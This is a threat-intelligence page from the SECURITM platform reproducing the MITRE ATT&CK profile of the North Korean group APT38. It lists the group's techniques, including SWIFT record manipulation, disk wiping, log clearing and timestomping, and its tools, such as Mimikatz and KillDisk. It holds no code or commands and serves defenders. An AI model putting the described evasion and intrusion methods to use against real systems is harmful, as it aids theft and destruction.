Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.

APT38

APT38 is a North Korean state-sponsored threat group that specializes in financial cyber operations; it has been attributed to the Reconnaissance General Bureau.(Citation: CISA AA20-239A BeagleBoyz August 2020) Active since at least 2014, APT38 has targeted banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. Significant operations include the 2016 Bank of Bangladesh heist, during which APT38 stole $81 million, as well as attacks against Bancomext (2018) and Banco de Chile (2018); some of their attacks have been destructive.(Citation: CISA AA20-239A BeagleBoyz August 2020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North Korea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under The Hood Blog 2017) North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name Lazarus Group instead of tracking clusters or subgroups.
ID: G0082
Associated Groups: NICKEL GLADSTONE, BeagleBoyz, Bluenoroff, Stardust Chollima
Version: 2.0
Created: 29 Jan 2019
Last Modified: 18 Jan 2022

Associated Group Descriptions

Name Description
NICKEL GLADSTONE (Citation: SecureWorks NICKEL GLADSTONE profile Sept 2021)
BeagleBoyz (Citation: CISA AA20-239A BeagleBoyz August 2020)
Bluenoroff (Citation: Kaspersky Lazarus Under The Hood Blog 2017)
Stardust Chollima (Citation: CrowdStrike Stardust Chollima Profile April 2018)(Citation: CrowdStrike GTR 2021 June 2021)

Techniques Used

Domain ID Name Use
Enterprise T1071 .001 Application Layer Protocol: Web Protocols

APT38 used a backdoor, QUICKRIDE, to communicate to the C2 server over HTTP and HTTPS.(Citation: FireEye APT38 Oct 2018)

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

APT38 has used PowerShell to execute commands and other operational tasks.(Citation: CISA AA20-239A BeagleBoyz August 2020)

.003 Command and Scripting Interpreter: Windows Command Shell

APT38 has used a command-line tunneler, NACHOCHEESE, to give them shell access to a victim’s machine.(Citation: FireEye APT38 Oct 2018)

.005 Command and Scripting Interpreter: Visual Basic

APT38 has used VBScript to execute commands and other operational tasks.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1543 .003 Create or Modify System Process: Windows Service

APT38 has installed a new Windows service to establish persistence.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1565 .001 Data Manipulation: Stored Data Manipulation

APT38 has used DYEPACK to create, delete, and alter records in databases used for SWIFT transactions.(Citation: FireEye APT38 Oct 2018)

.002 Data Manipulation: Transmitted Data Manipulation

APT38 has used DYEPACK to manipulate SWIFT messages en route to a printer.(Citation: FireEye APT38 Oct 2018)

.003 Data Manipulation: Runtime Data Manipulation

APT38 has used DYEPACK.FOX to manipulate PDF data as it is accessed to remove traces of fraudulent SWIFT transactions from the data displayed to the end user.(Citation: FireEye APT38 Oct 2018)

Enterprise T1561 .002 Disk Wipe: Disk Structure Wipe

APT38 has used a custom MBR wiper named BOOTWRECK to render systems inoperable.(Citation: FireEye APT38 Oct 2018)

Enterprise T1562 .003 Impair Defenses: Impair Command History Logging

APT38 has prepended a space to all of their terminal commands to operate without leaving traces in the HISTCONTROL environment.(Citation: CISA AA20-239A BeagleBoyz August 2020)

.004 Impair Defenses: Disable or Modify System Firewall

APT38 have created firewall exemptions on specific ports, including ports 443, 6443, 8443, and 9443.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1070 .001 Indicator Removal: Clear Windows Event Logs

APT38 clears Window Event logs and Sysmon logs from the system.(Citation: FireEye APT38 Oct 2018)

.004 Indicator Removal: File Deletion

APT38 has used a utility called CLOSESHAVE that can securely delete a file from the system. They have also removed malware, tools, or other non-native files used during the intrusion to reduce their footprint or as part of the post-intrusion cleanup process.(Citation: FireEye APT38 Oct 2018)(Citation: CISA AA20-239A BeagleBoyz August 2020)

.006 Indicator Removal: Timestomp

APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1056 .001 Input Capture: Keylogging

APT38 used a Trojan called KEYLIME to capture keystrokes from the victim’s machine.(Citation: FireEye APT38 Oct 2018)

Enterprise T1027 .002 Obfuscated Files or Information: Software Packing

APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium, to pack their implants.(Citation: FireEye APT38 Oct 2018)

Enterprise T1588 .002 Obtain Capabilities: Tool

APT38 has obtained and used open-source tools such as Mimikatz.(Citation: ESET Lazarus KillDisk April 2018)

Enterprise T1566 .001 Phishing: Spearphishing Attachment

APT38 has conducted spearphishing campaigns using malicious email attachments.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1053 .003 Scheduled Task/Job: Cron

APT38 has used cron to create pre-scheduled and periodic background jobs on a Linux system.(Citation: CISA AA20-239A BeagleBoyz August 2020)

.005 Scheduled Task/Job: Scheduled Task

APT38 has used Task Scheduler to run programs at system startup or on a scheduled basis for persistence.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1505 .003 Server Software Component: Web Shell

APT38 has used web shells for persistence or to ensure redundant access.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1518 .001 Software Discovery: Security Software Discovery

APT38 has identified security software, configurations, defensive tools, and sensors installed on a compromised system.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1218 .001 System Binary Proxy Execution: Compiled HTML File

APT38 has used CHM files to move concealed payloads.(Citation: Kaspersky Lazarus Under The Hood APR 2017)

.011 System Binary Proxy Execution: Rundll32

APT38 has used rundll32.exe to execute binaries, scripts, and Control Panel Item files and to execute code via proxy to avoid triggering security tools.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1569 .002 System Services: Service Execution

APT38 has created new services or modified existing ones to run executables, commands, or scripts.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Enterprise T1204 .002 User Execution: Malicious File

APT38 has attempted to lure victims into enabling malicious macros within email attachments.(Citation: CISA AA20-239A BeagleBoyz August 2020)

Software

ID Name References Techniques
S0039 Net (Citation: FireEye APT38 Oct 2018) (Citation: Microsoft Net Utility) (Citation: Savill 1999) Password Policy Discovery, Domain Groups, System Time Discovery, Domain Account, Local Account, System Service Discovery, Remote System Discovery, Network Share Discovery, System Network Connections Discovery, Network Share Connection Removal, Service Execution, Local Account, Local Groups, SMB/Windows Admin Shares, Domain Account
S0376 HOPLIGHT (Citation: CISA AA20-239A BeagleBoyz August 2020) (Citation: US-CERT HOPLIGHT Apr 2019) Modify Registry, Fallback Channels, Query Registry, Proxy, Non-Standard Port, Commonly Used Port, Pass the Hash, File and Directory Discovery, Security Account Manager, Windows Command Shell, Exfiltration Over C2 Channel, Standard Encoding, System Information Discovery, Service Execution, Ingress Tool Transfer, Windows Management Instrumentation, Uncommonly Used Port, Disable or Modify System Firewall, System Time Discovery, Process Injection
S0334 DarkComet (Citation: DarkKomet) (Citation: FireEye APT38 Oct 2018) (Citation: FYNLOS) (Citation: Fynloski) (Citation: Krademok) (Citation: Malwarebytes DarkComet March 2018) (Citation: TrendMicro DarkComet Sept 2014) Command and Scripting Interpreter, Clipboard Data, Video Capture, System Information Discovery, Ingress Tool Transfer, Process Discovery, Windows Command Shell, Disable or Modify System Firewall, Remote Desktop Protocol, Registry Run Keys / Startup Folder, Web Protocols, Audio Capture, Disable or Modify Tools, Software Packing, Modify Registry, Keylogging, System Owner/User Discovery, Match Legitimate Name or Location
S0002 Mimikatz (Citation: Adsecurity Mimikatz Guide) (Citation: Deply Mimikatz) (Citation: FireEye APT38 Oct 2018) DCSync, Credentials from Password Stores, Rogue Domain Controller, Private Keys, SID-History Injection, Security Support Provider, Pass the Hash, Account Manipulation, Pass the Ticket, Credentials from Web Browsers, Golden Ticket, Security Account Manager, LSASS Memory, Silver Ticket, Windows Credential Manager, Steal or Forge Authentication Certificates, LSA Secrets
S0607 KillDisk (Citation: ESEST Black Energy Jan 2016) (Citation: ESET Lazarus KillDisk April 2018) (Citation: KillDisk Ransomware) (Citation: Trend Micro KillDisk 1) (Citation: Trend Micro KillDisk 2) File and Directory Discovery, Native API, System Information Discovery, Shared Modules, Process Discovery, Obfuscated Files or Information, Service Stop, Clear Windows Event Logs, System Shutdown/Reboot, Disk Structure Wipe, Data Encrypted for Impact, File Deletion, Masquerade Task or Service, Access Token Manipulation, Data Destruction
S0593 ECCENTRICBANDWAGON (Citation: CISA AA20-239A BeagleBoyz August 2020) (Citation: CISA EB Aug 2020) File Deletion, Obfuscated Files or Information, Windows Command Shell, Screen Capture, Keylogging, Local Data Staging